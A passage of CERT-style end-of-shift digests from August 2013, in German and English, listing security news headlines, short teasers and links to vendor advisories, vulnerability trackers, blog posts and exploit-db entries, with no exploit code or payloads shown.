Itd be easy to assume that in a Mir-based world, the Mir server receives input events and hands them over to Mir clients. In fact, as I described here, XMir uses standard Xorg input drivers and so receives all input events directly. This led to issues like the duplicate mouse pointer seen in earlier versions of XMir - as well as the pointer being drawn by XMir, Mir was drawing its own pointer.But theres also some more subtle issues. Mir recently gained a fairly simple implementation of VT...
---------------------------------------------
http://mjg59.dreamwidth.org/27327.html
*** Jumping Out of IE's Sandbox With One Click ***
---------------------------------------------
Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft's August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security [...]
---------------------------------------------
http://threatpost.com/jumping-out-of-ies-sandbox-with-one-click/102054
*** BSI: Trotz "kritischer Aspekte" keine Warnung vor Windows 8 ***
---------------------------------------------
In einer Stellungnahme stellt das Bundesamt klar, dass es keine grundsätzlichen Sicherheitsbedenken gegen den Einsatz von Windows 8 und Trusted Computing habe. Das BSI kritisiert allerdings bestimmte Aspekte des Betriebssystems.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-Trotz-kritischer-Aspekte-keine-War…
*** Siemens COMOS Privilege Escalation Vulnerability ***
---------------------------------------------
OVERVIEW: Siemens has notified ICS-CERT of a privilege escalation vulnerability in the Siemens COMOS database application. Siemens has produced a patch that mitigates this vulnerability. AFFECTED PRODUCTS: The following Siemens COMOS versions are affected:...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-233-01
*** Cisco Prime Central for Hosted Collaboration Solution Assurance Denial of Service Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** MySQL Debian/Ubuntu Installation Script Lets Local Users Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1028927
*** Hotel Software and Booking system 1.8 SQL Injection & Cross Site Scripting ***
---------------------------------------------
Topic: Hotel Software and Booking system 1.8 SQL Injection & Cross Site Scripting Risk: Medium Text: # Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection / Cross Site Scripting # Date: 21 de A...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080175
*** Drupal Zen 7.x Cross Site Scripting ***
---------------------------------------------
Topic: Drupal Zen 7.x Cross Site Scripting Risk: Low Text:View online: https://drupal.org/node/2071157 * Advisory ID: DRUPAL-SA-CONTRIB-2013-070 * Project: Zen [1] (third-party ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080180
*** Debian update for cacti ***
---------------------------------------------
https://secunia.com/advisories/54181
*** Multiple NetGear ProSafe Switches CVE-2013-4776 Remote Denial of Service Vulnerability ***
---------------------------------------------
A range of ProSafe switches are affected by two different vulnerabilities. CVE-2013-4775: Unauthenticated startup-config disclosure. CVE-2013-4776: Denial of Service vulne...
---------------------------------------------
http://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_aug_2…
*** [webapps] - Netgear ProSafe - Denial of Service Vulnerability ***
---------------------------------------------
http://www.exploit-db.com/exploits/27775
*** [webapps] - Netgear ProSafe - Information Disclosure Vulnerability ***
---------------------------------------------
http://www.exploit-db.com/exploits/27774
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 20-08-2013 18:00 − Mittwoch 21-08-2013 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Hacker greift offenbar Zugangsdaten für Twitter ab ***
---------------------------------------------
Ein Hacker hat sich offenbar Zugang zu Anmeldedaten des Kurznachrichtendienstes Twitter verschafft. Der Angreifer, der sich Mauritania Hacker nennt, hat am Dienstag angebliche Detailinformationen zu mehr als 15.000 Twitter-Accounts veröffentlicht.
---------------------------------------------
http://www.heise.de/security/meldung/Hacker-greift-offenbar-Zugangsdaten-fu…
*** Poison Ivy: Assessing Damage and Extracting Intelligence ***
---------------------------------------------
Today, our research team is publishing a report on the Poison Ivy family of remote access tools (RATs) along with a package of tools created...
---------------------------------------------
http://www.fireeye.com/blog/technical/targeted-attack/2013/08/pivy-assessin…
*** Measuring Entropy and its Applications to Encryption ***
---------------------------------------------
There have been a bunch of articles about an information theory paper with vaguely sensational headlines like "Encryption is less secure than we thought" and "Research shakes crypto foundations." Its actually not that bad. Basically, the researchers arguethat the traditional measurement of Shannon entropy isnt the right model to use for cryptography, and that minimum entropy is. This difference may...
---------------------------------------------
http://www.schneier.com/blog/archives/2013/08/measuring_entro.html
*** Sicherheitsforscher: Zero-Day-Lücke im Adobe Reader ***
---------------------------------------------
In der aktuellen Version des Adobe Reader soll eine kritische Schwachstelle klaffen, durch die Angreifer Schadcode in PDF-Dokumenten platzieren können. Der Code wird ausgeführt, sobald man das Dokument öffnet.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsforscher-Zero-Day-Luecke-im…
*** Gpg4win 2.2 verschlüsselt E-Mails und Dateien ***
---------------------------------------------
Die neue Version 2.2 der GnuPG-Version für Windows unterstützt Outlook 2010 und 2013. Das Verschlüsselungs-Plug-in für den Windows Explorer liegt jetzt auch in einer 64-Bit-Version bei.
---------------------------------------------
http://www.heise.de/security/meldung/Gpg4win-2-2-verschluesselt-E-Mails-und…
*** Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 8.0.0.7 ***
---------------------------------------------
Cross reference list for security vulnerabilities fixed in IBM WebSphere Application Server Fix Pack 8.0.0.7 CVE(s): CVE-2013-2967, CVE-2013-2976, CVE-2013-4004, CVE-2013-0169, CVE-2013-0597, CVE-2013-1768, CVE-2013-1862, CVE-2013-4005, CVE-2013-3029, CVE-2013-1896, and CVE-2012-2098 Affected product(s) and affected version(s): The following IBM WebSphere Application Server Versions are affected: Version 8.5 Version 8 Version 7 Version 6.1 OSGi Applications and JPA Feature Pack EJB 3.0
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_pot…
*** RSA Authentication Agent for PAM Allows Remote Users to Make Unlimited Login Attempts ***
---------------------------------------------
http://www.securitytracker.com/id/1028930
*** IBM WebSphere Portal Unspecified Bug Lets Remote Users Access User Directories ***
---------------------------------------------
http://www.securitytracker.com/id/1028933
*** McAfee Email Gateway Email Processing "ws_inv-smtp" Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54486
*** PHP OpenID XRDS Processing XML External Entities Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54542
*** Multiple Vulnerabilities in Cisco Unified Communications Manager ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…